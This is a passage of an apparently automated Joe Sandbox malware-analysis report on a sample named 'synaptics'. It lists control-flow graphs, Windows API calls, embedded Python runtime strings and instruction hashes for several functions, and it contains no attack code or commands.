                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C22C5716043029FD700CF98D981A5AB7F9FF89328F184669E9588BB91E730EC85DBD1

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 951 6cb04dd0-6cb04e04 952 6cb04e0a-6cb04e21 951->952 953 6cb04eed-6cb04eff 951->953 954 6cb04e23-6cb04e38 952->954 955 6cb04e7c-6cb04e91 952->955 958 6cb050b2-6cb050c4 953->958 959 6cb04f05-6cb04f49 SetErrorMode 953->959 954->955 961 6cb04e3a-6cb04e5d 954->961 955->953 962 6cb04e93-6cb04e9f 955->962 967 6cb052b4 959->967 968 6cb04f4f-6cb04f9e SetErrorMode 959->968 975 6cb04e63-6cb04e70 961->975 976 6cb052a5-6cb052aa 961->976 965 6cb04ea1-6cb04eaf 962->965 965->965 969 6cb04eb1-6cb04eb8 965->969 972 6cb052be 967->972 984 6cb04fa4-6cb04fd1 968->984 985 6cb050c5-6cb050ec 968->985 969->953 970 6cb04eba-6cb04ed2 969->970 970->976 977 6cb04ed8-6cb04ee5 970->977 978 6cb052c3 972->978 980 6cb04e73-6cb04e7a 975->980 976->967 982 6cb04ee8 977->982 983 6cb052cd-6cb052d7 978->983 980->953 980->955 982->953 996 6cb04fd3-6cb04fe4 984->996 997 6cb04fe9-6cb04fec 984->997 989 6cb050f2-6cb050ff 985->989 990 6cb05228-6cb05241 985->990 991 6cb05101-6cb05109 989->991 992 6cb0510b-6cb05113 989->992 990->983 1009 6cb05247-6cb052a4 990->1009 994 6cb05121-6cb05128 991->994 992->990 995 6cb05119-6cb0511e 992->995 994->990 999 6cb0512e-6cb05136 994->999 995->994 1008 6cb0506a-6cb0506c 996->1008 1000 6cb04fee-6cb04ff7 997->1000 1001 6cb0501f-6cb05051 997->1001 999->990 1002 6cb0513c-6cb05145 999->1002 1000->1001 1005 6cb04ff9-6cb05002 1000->1005 1026 6cb05053-6cb05056 1001->1026 1027 6cb05064 1001->1027 1002->990 1007 6cb0514b 1002->1007 1005->1001 1010 6cb05004-6cb0500f 1005->1010 1011 6cb05150-6cb0515a 1007->1011 1008->958 1012 6cb0506e-6cb0508e call 6cb068b0 1008->1012 1010->972 1014 6cb05015-6cb05017 1010->1014 1016 6cb05160-6cb05165 1011->1016 1028 6cb05090-6cb05093 1012->1028 1029 6cb050a1-6cb050a4 1012->1029 1014->1001 1016->1016 1018 6cb05167-6cb0516c 1016->1018 1021 6cb05172-6cb05185 1018->1021 1022 6cb0521c-6cb05222 1018->1022 1021->1022 1034 6cb0518b-6cb05190 1021->1034 1022->990 1022->1011 1026->1027 1030 6cb05058-6cb05061 1026->1030 1027->1008 1028->1029 1032 6cb05095-6cb0509e 1028->1032 1029->958 1033 6cb050a6-6cb050af 1029->1033 1030->1027 1032->1029 1033->958 1036 6cb05192-6cb05196 1034->1036 1039 6cb051b2-6cb051b4 1036->1039 1040 6cb05198-6cb0519a 1036->1040 1043 6cb051b7-6cb051b9 1039->1043 1041 6cb0519c-6cb051a2 1040->1041 1042 6cb051ae-6cb051b0 1040->1042 1041->1039 1044 6cb051a4-6cb051ac 1041->1044 1042->1043 1043->1022 1045 6cb051bb-6cb051c3 1043->1045 1044->1036 1044->1042 1046 6cb051c5-6cb051c7 1045->1046 1047 6cb051d7-6cb051d9 1045->1047 1046->1047 1048 6cb051c9-6cb051cd 1046->1048 1047->990 1049 6cb051db-6cb051ee 1047->1049 1048->1022 1050 6cb051cf-6cb051d5 1048->1050 1049->990 1052 6cb051f0-6cb05214 call 6cb06b50 1049->1052 1050->1046 1050->1047 1052->978 1057 6cb0521a-6cb05276 1052->1057
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000001), ref: 6CB04F27
                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(?), ref: 6CB04F96
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB02000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB02000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb02000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                                                                                    • Opcode ID: 4b4ce92c9f3322a9198152e58997b6718ca9fa1d7d3ce4984aabda2dc6e37c72
                                                                                                                                                                                                                                    • Instruction ID: fea3bc09444a17314249acb6ca911d7947258ab383e5defd210a1ef1a201ab87
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b4ce92c9f3322a9198152e58997b6718ca9fa1d7d3ce4984aabda2dc6e37c72
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0D16734B002499BDB10CF64CC44BEA3BB8EF05308F0441A8E9459BE82EB71DD89CBD9

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1061 6cb09070-6cb090ad 1065 6cb090ca-6cb090e3 GetFileType 1061->1065 1066 6cb090af-6cb090c9 1061->1066 1069 6cb090e5-6cb090ef 1065->1069 1070 6cb0911a-6cb0911d 1065->1070 1079 6cb090f5-6cb09119 1069->1079 1080 6cb091ba-6cb091cc 1069->1080 1072 6cb09161-6cb0916e GetFileInformationByHandle 1070->1072 1073 6cb0911f-6cb09122 1070->1073 1074 6cb09170-6cb0919a 1072->1074 1075 6cb0919b-6cb091b7 call 6cb08f10 1072->1075 1076 6cb09140-6cb09143 1073->1076 1077 6cb09124-6cb0913f 1073->1077 1075->1080 1076->1080 1082 6cb09145-6cb09160 1076->1082
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 6CB090DB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB02000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB02000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb02000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileType
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                                                                                                    • Opcode ID: 9847428af0cae830715622206015bdd8b4497c6992d375245eff837d6d267615
                                                                                                                                                                                                                                    • Instruction ID: 6f0d2f9f5fdbbcd2d2efacb342816ec6655da6d773fa40562d9f79f8adc7b5f8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9847428af0cae830715622206015bdd8b4497c6992d375245eff837d6d267615
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC41CE32B001445BCF04EFBAD8946AEB7B5EF89335B14457AE909CB781EF3199088791

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1094 6cb29ae0-6cb29b01 1095 6cb29b07-6cb29b2c call 6cb29510 call 6cb29710 1094->1095 1096 6cb29fbc-6cb29fc2 1094->1096 1101 6cb29b39-6cb29b4c 1095->1101 1102 6cb29b2e-6cb29b37 1095->1102 1105 6cb29b67-6cb29b70 1101->1105 1106 6cb29b4e-6cb29b65 1101->1106 1107 6cb29b73-6cb29b8c 1102->1107 1105->1107 1106->1105 1106->1107 1111 6cb29b98-6cb29bc2 1107->1111 1112 6cb29b8e-6cb29b95 1107->1112 1116 6cb29bc4-6cb29bca 1111->1116 1117 6cb29bcd-6cb29bcf 1111->1117 1112->1111 1116->1117 1118 6cb29be2-6cb29bec 1117->1118 1119 6cb29bd1-6cb29bd4 1117->1119 1122 6cb29c17-6cb29c20 1118->1122 1123 6cb29bee-6cb29c03 1118->1123 1119->1118 1121 6cb29bd6-6cb29bdf 1119->1121 1121->1118 1124 6cb29c26-6cb29c2e 1122->1124 1125 6cb29cf8-6cb29cfe 1122->1125 1128 6cb29c0a-6cb29c0d 1123->1128 1124->1125 1126 6cb29c34-6cb29c39 1124->1126 1129 6cb29df4-6cb29df9 1125->1129 1130 6cb29d04-6cb29d0a 1125->1130 1126->1125 1131 6cb29c3f-6cb29c6f 1126->1131 1128->1122 1132 6cb29e22 1129->1132 1133 6cb29dfb-6cb29e20 1129->1133 1134 6cb29de3-6cb29de6 1130->1134 1135 6cb29d10-6cb29d26 1130->1135 1145 6cb29c71-6cb29c7a 1131->1145 1146 6cb29c7d-6cb29c84 1131->1146 1142 6cb29e2d-6cb29e46 1132->1142 1133->1142 1134->1129 1138 6cb29de8-6cb29df1 1134->1138 1136 6cb29dda-6cb29ddd 1135->1136 1137 6cb29d2c-6cb29d32 1135->1137 1136->1134 1136->1135 1137->1136 1140 6cb29d38-6cb29d40 1137->1140 1138->1129 1143 6cb29d42-6cb29d52 1140->1143 1144 6cb29d7b 1140->1144 1156 6cb29f64-6cb29f77 1142->1156 1157 6cb29e4c-6cb29e55 1142->1157 1143->1144 1161 6cb29d54-6cb29d79 1143->1161 1150 6cb29d7e-6cb29d84 1144->1150 1145->1146 1146->1125 1149 6cb29c86-6cb29c9a 1146->1149 1169 6cb29cbe-6cb29cd0 1149->1169 1170 6cb29c9c-6cb29ca9 1149->1170 1154 6cb29dd6 1150->1154 1155 6cb29d86-6cb29d8c 1150->1155 1154->1136 1155->1154 1163 6cb29d8e-6cb29d95 1155->1163 1158 6cb29f85-6cb29f93 1156->1158 1159 6cb29f79-6cb29f82 1156->1159 1164 6cb29f10-6cb29f1a 1157->1164 1165 6cb29e5b 1157->1165 1158->1096 1166 6cb29f95-6cb29fa0 1158->1166 1159->1158 1161->1150 1171 6cb29d97-6cb29da5 1163->1171 1172 6cb29db5-6cb29dba 1163->1172 1167 6cb29f41-6cb29f52 1164->1167 1168 6cb29f1c-6cb29f3f 1164->1168 1173 6cb29e60-6cb29e6f 1165->1173 1183 6cb29faf-6cb29fb2 1166->1183 1167->1156 1193 6cb29f54-6cb29f61 1167->1193 1168->1193 1191 6cb29cd2-6cb29cd5 1169->1191 1192 6cb29ce3-6cb29ce5 1169->1192 1170->1169 1194 6cb29cab-6cb29cbc 1170->1194 1171->1172 1178 6cb29da7-6cb29db2 1171->1178 1174 6cb29dc5-6cb29dc8 1172->1174 1175 6cb29dbc-6cb29dbd call 6ca40e97 1172->1175 1179 6cb29e71-6cb29e81 1173->1179 1180 6cb29ece-6cb29ed3 1173->1180 1174->1154 1182 6cb29dca-6cb29dd3 1174->1182 1190 6cb29dc2 1175->1190 1178->1172 1195 6cb29ef4 1179->1195 1198 6cb29e83-6cb29e93 1179->1198 1187 6cb29ed5-6cb29eda 1180->1187 1188 6cb29ef8-6cb29f0a 1180->1188 1182->1154 1183->1096 1187->1195 1196 6cb29edc-6cb29ee6 1187->1196 1188->1164 1188->1173 1190->1174 1191->1192 1199 6cb29cd7-6cb29ce0 1191->1199 1192->1125 1201 6cb29ce7-6cb29cea 1192->1201 1193->1156 1194->1191 1195->1188 1196->1195 1202 6cb29ee8-6cb29eeb 1196->1202 1210 6cb29e95-6cb29ebd 1198->1210 1211 6cb29eca 1198->1211 1199->1192 1201->1125 1205 6cb29cec-6cb29cf5 1201->1205 1204 6cb29eec 1202->1204 1209 6cb29ef1 1204->1209 1205->1125 1209->1195 1210->1195 1215 6cb29ebf-6cb29ec2 1210->1215 1211->1180 1215->1195 1216 6cb29ec4-6cb29ec8 1215->1216 1216->1204
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • gc: %zd uncollectable objects at shutdown; use gc.set_debug(gc.DEBUG_UNCOLLECTABLE) to list them, xrefs: 6CB29C43, 6CB29C50
                                                                                                                                                                                                                                    • gc: %zd uncollectable objects at shutdown, xrefs: 6CB29C48
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB29000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB29000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb29000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: gc: %zd uncollectable objects at shutdown$gc: %zd uncollectable objects at shutdown; use gc.set_debug(gc.DEBUG_UNCOLLECTABLE) to list them
                                                                                                                                                                                                                                    • API String ID: 0-1666125810
                                                                                                                                                                                                                                    • Opcode ID: c70cbd388ad17aa86f797e821983ae7451eead5321f3f643598df67da874414b
                                                                                                                                                                                                                                    • Instruction ID: c7f555dfc92fe45787671a17f13939b6191aec4feee376ff0c4484cf5153e0cb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c70cbd388ad17aa86f797e821983ae7451eead5321f3f643598df67da874414b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5D107B1E052819BD700DF64DD81BAAB3A0FF05318F144628EC2D9BB91E739F859C792

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1218 6c9c6b70-6c9c6be9 1220 6c9c6bef-6c9c6c01 1218->1220 1221 6c9c6b50-6c9c6b62 1218->1221 1222 6c9c6c08-6c9c6c0b 1220->1222 1223 6c9c6c03-6c9c6c06 1220->1223 1224 6c9c6c0d 1222->1224 1225 6c9c6c10-6c9c6c42 1222->1225 1223->1225 1224->1225 1227 6c9c6c84-6c9c6c8e 1225->1227 1228 6c9c6c44-6c9c6c54 1225->1228 1230 6c9c6c9f-6c9c6cb3 1227->1230 1231 6c9c6c90-6c9c6c9a 1227->1231 1229 6c9c6c57 1228->1229 1232 6c9c6c63-6c9c6c6d call 6cb09070 1229->1232 1234 6c9c6cb9-6c9c6cbe 1230->1234 1235 6c9c6db2-6c9c6dd6 1230->1235 1231->1230 1236 6c9c6c72-6c9c6c7f 1232->1236 1237 6c9c6cc0-6c9c6cdd 1234->1237 1241 6c9c6dd8-6c9c6ddb 1235->1241 1242 6c9c6dfb-6c9c6e0a 1235->1242 1238 6c9c6e4d-6c9c6e6a 1236->1238 1240 6c9c6ce3-6c9c6cec 1237->1240 1247 6c9c6f00-6c9c6f0e 1238->1247 1248 6c9c6e70-6c9c6e79 1238->1248 1246 6c9c6cf6-6c9c6d1b 1240->1246 1244 6c9c6ddd-6c9c6de3 1241->1244 1245 6c9c6de6-6c9c6df6 1241->1245 1250 6c9c6e0c-6c9c6e15 1242->1250 1251 6c9c6e18-6c9c6e1d 1242->1251 1244->1245 1245->1242 1261 6c9c6d1d-6c9c6d26 1246->1261 1262 6c9c6d86 1246->1262 1252 6c9c6f35-6c9c6f57 1247->1252 1253 6c9c6f10-6c9c6f30 1247->1253 1248->1252 1264 6c9c6e7f-6c9c6e86 1248->1264 1250->1251 1255 6c9c6d89-6c9c6d93 1251->1255 1256 6c9c6e23-6c9c6e48 1251->1256 1272 6c9c6f5d-6c9c6f61 1252->1272 1273 6c9c6e89-6c9c6e8e 1252->1273 1253->1273 1255->1229 1260 6c9c6d99-6c9c6dad 1255->1260 1256->1238 1274 6c9c6e94-6c9c6efb 1260->1274 1261->1262 1275 6c9c6d28-6c9c6d5a 1261->1275 1262->1255 1264->1273 1277 6c9c6f8e-6c9c6f90 1272->1277 1278 6c9c6f63-6c9c6f77 1272->1278 1273->1274 1276 6c9c6f95-6c9c6fd4 1274->1276 1275->1237 1282 6c9c6d60-6c9c6d6a 1275->1282 1290 6c9c6fda-6c9c6ff1 1276->1290 1291 6c9c6fd6-6c9c6fd8 1276->1291 1277->1276 1278->1273 1283 6c9c6f7d-6c9c6f80 1278->1283 1282->1237 1284 6c9c6d70-6c9c6d81 1282->1284 1283->1277 1286 6c9c6f82-6c9c6f8b 1283->1286 1284->1234 1286->1277 1291->1290
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • expected integer from opener, xrefs: 6C9C6DF1
                                                                                                                                                                                                                                    • Cannot use closefd=False with file name, xrefs: 6C9C6C95
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C6000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C6000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c6000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Cannot use closefd=False with file name$expected integer from opener
                                                                                                                                                                                                                                    • API String ID: 0-1400950270
                                                                                                                                                                                                                                    • Opcode ID: a5ebca71412a7bd3a88c1a41089f9df2e4a9a707b28b93cc5fc8805ae785354e
                                                                                                                                                                                                                                    • Instruction ID: 4696cbcf99804619ed5af7a48cfa3c8dd1c361d74056cb60d5dfd35dd953607a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5ebca71412a7bd3a88c1a41089f9df2e4a9a707b28b93cc5fc8805ae785354e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75B1E1B1B05200DFDB01CF25D845B667BB5AF86328F088169E949CFB91E735E885CB93

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1296 6caf5c30-6caf5c4c 1297 6caf5c4e-6caf5c50 1296->1297 1298 6caf5c86-6caf5c8f call 6caf5410 1296->1298 1297->1298 1299 6caf5c52-6caf5c54 1297->1299 1303 6caf5cc7-6caf5cc9 1298->1303 1304 6caf5c91-6caf5ca8 call 6caf4af0 1298->1304 1299->1298 1301 6caf5c56-6caf5c80 1299->1301 1301->1298 1306 6caf5ccf-6caf5cd1 1303->1306 1307 6caf5ed1-6caf5edc 1303->1307 1312 6caf5cae-6caf5cc4 1304->1312 1313 6caf5d55-6caf5d5d 1304->1313 1306->1307 1308 6caf5cd7-6caf5cdb 1306->1308 1310 6caf5eac-6caf5eaf 1308->1310 1311 6caf5ce1-6caf5ce7 1308->1311 1315 6caf5eb2-6caf5eb8 1310->1315 1311->1310 1314 6caf5ced-6caf5cf3 1311->1314 1312->1303 1314->1310 1316 6caf5cf9-6caf5d03 1314->1316 1315->1307 1317 6caf5eba-6caf5ebe call 6cafa310 1315->1317 1316->1310 1318 6caf5d09-6caf5d0b 1316->1318 1321 6caf5ec3-6caf5ec5 1317->1321 1318->1310 1320 6caf5d11-6caf5d1f call 6cafe2d0 1318->1320 1320->1313 1325 6caf5d21-6caf5d45 1320->1325 1321->1313 1323 6caf5ecb-6caf5ecf 1321->1323 1323->1315 1327 6caf5d5e-6caf5d73 call 6caf37d0 1325->1327 1328 6caf5d47-6caf5d52 call 6cafeb30 1325->1328 1327->1313 1333 6caf5d75-6caf5d93 1327->1333 1328->1313 1335 6caf5e59 1333->1335 1336 6caf5d99 1333->1336 1344 6caf5e61-6caf5e7b call 6caf4e80 1335->1344 1336->1335 1337 6caf5e4f-6caf5e57 1336->1337 1338 6caf5ddf-6caf5dec 1336->1338 1339 6caf5dce-6caf5ddd 1336->1339 1340 6caf5dfa-6caf5e1e call 6caf5230 1336->1340 1341 6caf5daa-6caf5db2 1336->1341 1342 6caf5db7-6caf5dc9 1336->1342 1343 6caf5da0-6caf5da6 1336->1343 1337->1344 1345 6caf5df3 1338->1345 1339->1345 1352 6caf5e3d-6caf5e3f 1340->1352 1353 6caf5e20-6caf5e22 1340->1353 1341->1344 1342->1344 1343->1341 1350 6caf5e8d-6caf5e8f 1344->1350 1351 6caf5e7d-6caf5e8a 1344->1351 1345->1335 1345->1337 1345->1340 1345->1341 1350->1313 1354 6caf5e95-6caf5ea6 call 6caf5320 1350->1354 1351->1350 1352->1310 1356 6caf5e41-6caf5e4d 1352->1356 1353->1313 1355 6caf5e28-6caf5e3c 1353->1355 1354->1310 1354->1313 1356->1310
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: 4$Z
                                                                                                                                                                                                                                    • API String ID: 0-2508167572
                                                                                                                                                                                                                                    • Opcode ID: ace56e496c81cb11a771745a4d4f8ccb2f880f53532f85065b1823001dee2797
                                                                                                                                                                                                                                    • Instruction ID: 063999b07456a07eddca3c57b12fd329eb2e2b8dee0592c66fb85735d7c7102a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ace56e496c81cb11a771745a4d4f8ccb2f880f53532f85065b1823001dee2797
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81813D746097028FD708CF28D590956B7F1FF89318F18866DE8698BB51EB31E887CB91

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1362 6c9cc740-6c9cc761 1363 6c9cc7c6-6c9cc7d3 1362->1363 1364 6c9cc763-6c9cc773 1362->1364 1369 6c9cc7e4-6c9cc80c call 6c9cc5c0 1363->1369 1370 6c9cc7d5-6c9cc7de call 6c9cc190 1363->1370 1365 6c9cc775-6c9cc77f 1364->1365 1366 6c9cc781-6c9cc786 1364->1366 1368 6c9cc78b-6c9cc7a2 1365->1368 1366->1368 1377 6c9cc921-6c9cc929 1368->1377 1379 6c9cc7a8-6c9cc7ab 1368->1379 1380 6c9ccc8c 1369->1380 1381 6c9cc812 1369->1381 1370->1369 1370->1377 1379->1377 1382 6c9cc7b1-6c9cc7c5 1379->1382 1385 6c9ccc8e-6c9ccc9a 1380->1385 1383 6c9cc824-6c9cc828 1381->1383 1384 6c9cc814-6c9cc81f 1381->1384 1386 6c9cc8a9-6c9cc8b5 1383->1386 1387 6c9cc82a-6c9cc82e 1383->1387 1384->1385 1389 6c9ccc9c-6c9cccaf 1385->1389 1390 6c9cccc9-6c9cccd1 1385->1390 1393 6c9cc8e4-6c9cc914 1386->1393 1394 6c9cc8b7-6c9cc8ca 1386->1394 1391 6c9cc889-6c9cc895 1387->1391 1392 6c9cc830-6c9cc835 1387->1392 1399 6c9cccb1-6c9cccb9 1389->1399 1400 6c9cccc2 1389->1400 1391->1386 1395 6c9cc897-6c9cc8a6 1391->1395 1392->1391 1396 6c9cc837-6c9cc84e 1392->1396 1409 6c9cc92a-6c9cc945 1393->1409 1410 6c9cc916-6c9cc91f call 6c9cc190 1393->1410 1404 6c9cc8cc-6c9cc8d4 1394->1404 1405 6c9cc8dd 1394->1405 1395->1386 1407 6c9cc87b-6c9cc880 1396->1407 1408 6c9cc850-6c9cc869 1396->1408 1399->1400 1400->1390 1404->1405 1405->1393 1411 6c9cc886 1407->1411 1408->1407 1416 6c9cc86b-6c9cc86e 1408->1416 1417 6c9cc947-6c9cc95e 1409->1417 1418 6c9cc960-6c9cc963 1409->1418 1410->1377 1410->1409 1411->1391 1416->1391 1419 6c9cc870-6c9cc879 1416->1419 1421 6c9cc971-6c9cc98a call 6ca08650 1417->1421 1420 6c9cc965-6c9cc96e 1418->1420 1418->1421 1419->1411 1420->1421 1425 6c9cc98f-6c9cc99d 1421->1425 1426 6c9cc99f-6c9cc9af 1425->1426 1427 6c9cc9b6-6c9cc9bb 1425->1427 1426->1427 1428 6c9ccc6e-6c9ccc8a 1427->1428 1429 6c9cc9c1-6c9cc9de 1427->1429 1428->1385 1431 6c9ccc39-6c9ccc45 1429->1431 1432 6c9cc9e4-6c9cc9eb 1429->1432 1434 6c9ccc4b 1431->1434 1432->1431 1433 6c9cc9f1-6c9cc9f6 1432->1433 1435 6c9cc9fc-6c9cca2c 1433->1435 1436 6c9ccc28-6c9ccc37 1433->1436 1437 6c9ccc4e-6c9ccc56 1434->1437 1438 6c9cca30-6c9cca32 1435->1438 1436->1434 1439 6c9ccc58-6c9ccc5d 1437->1439 1440 6c9ccc6b 1437->1440 1441 6c9cca3f-6c9cca46 1438->1441 1442 6c9cca34-6c9cca3a 1438->1442 1439->1440 1444 6c9ccc5f-6c9ccc68 1439->1444 1440->1428 1445 6c9cca4c-6c9cca53 1441->1445 1446 6c9ccbbd-6c9ccbc2 1441->1446 1442->1441 1444->1440 1445->1446 1447 6c9cca59-6c9cca67 1445->1447 1448 6c9ccbc4-6c9ccbd5 1446->1448 1449 6c9ccbe3-6c9ccbe6 1446->1449 1451 6c9cca69-6c9cca7c 1447->1451 1452 6c9cca84-6c9cca93 1447->1452 1448->1449 1460 6c9ccbd7-6c9ccbe0 1448->1460 1453 6c9ccbe8-6c9ccbf1 1449->1453 1454 6c9ccbf4-6c9ccc26 1449->1454 1461 6c9cca7e 1451->1461 1462 6c9cca99-6c9cca9c 1451->1462 1452->1462 1463 6c9ccba2-6c9ccba5 1452->1463 1453->1454 1454->1437 1460->1449 1461->1452 1467 6c9ccb63-6c9ccb69 1461->1467 1468 6c9cca9e-6c9ccaa7 1462->1468 1469 6c9ccaaa-6c9ccaad 1462->1469 1464 6c9ccbb7 1463->1464 1465 6c9ccba7-6c9ccbb4 1463->1465 1473 6c9ccbb9 1464->1473 1465->1464 1467->1473 1474 6c9ccb6b-6c9ccb70 1467->1474 1468->1469 1471 6c9ccaaf-6c9ccab8 1469->1471 1472 6c9ccabb-6c9ccac7 1469->1472 1471->1472 1475 6c9ccac9-6c9ccaf4 1472->1475 1476 6c9ccb07-6c9ccb2f 1472->1476 1473->1446 1479 6c9ccb82-6c9ccb84 1474->1479 1480 6c9ccb72-6c9ccb7f 1474->1480 1475->1476 1498 6c9ccaf6-6c9ccaf9 1475->1498 1483 6c9ccb31-6c9ccb33 1476->1483 1484 6c9ccb52-6c9ccb57 1476->1484 1479->1473 1480->1479 1489 6c9ccb3d-6c9ccb40 1483->1489 1490 6c9ccb35-6c9ccb3b 1483->1490 1485 6c9ccb59-6c9ccb5b 1484->1485 1486 6c9ccb86-6c9ccb97 1484->1486 1485->1438 1492 6c9ccb61 1485->1492 1495 6c9ccb9d-6c9cccd7 1486->1495 1496 6c9ccce1-6c9ccd13 1486->1496 1489->1484 1491 6c9ccb42-6c9ccb4f 1489->1491 1490->1484 1491->1484 1492->1446 1495->1496 1502 6c9ccd19-6c9ccd2d 1496->1502 1503 6c9ccda3-6c9ccdc3 1496->1503 1498->1476 1500 6c9ccafb-6c9ccb04 1498->1500 1500->1476 1505 6c9ccd2f-6c9ccd4d 1502->1505 1506 6c9ccd69-6c9ccd87 1502->1506 1510 6c9ccdce-6c9ccdd1 1503->1510 1511 6c9ccdc5-6c9ccdcd 1503->1511 1505->1511 1517 6c9ccd4f-6c9ccd52 1505->1517 1506->1511 1516 6c9ccd89-6c9ccd8c 1506->1516 1512 6c9ccddf-6c9ccdfd 1510->1512 1513 6c9ccdd3-6c9ccddc 1510->1513 1513->1512 1516->1511 1519 6c9ccd8e-6c9ccda2 1516->1519 1517->1511 1520 6c9ccd54-6c9ccd68 1517->1520
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9CC000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9CC000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9cc000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                    • Opcode ID: 1f70100a678c2deb6852047923d07a5abe81333833c0c5edfeeb7355dc8dad46
                                                                                                                                                                                                                                    • Instruction ID: 1a4f033cda41ef563d1df42070f1a0699e7e7c825eb3e588b1d47d2304324021
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f70100a678c2deb6852047923d07a5abe81333833c0c5edfeeb7355dc8dad46
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6612D1B17043019FD710EFA9D880B567BF8EF85328F144669E9198BB91E731E849CB93

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
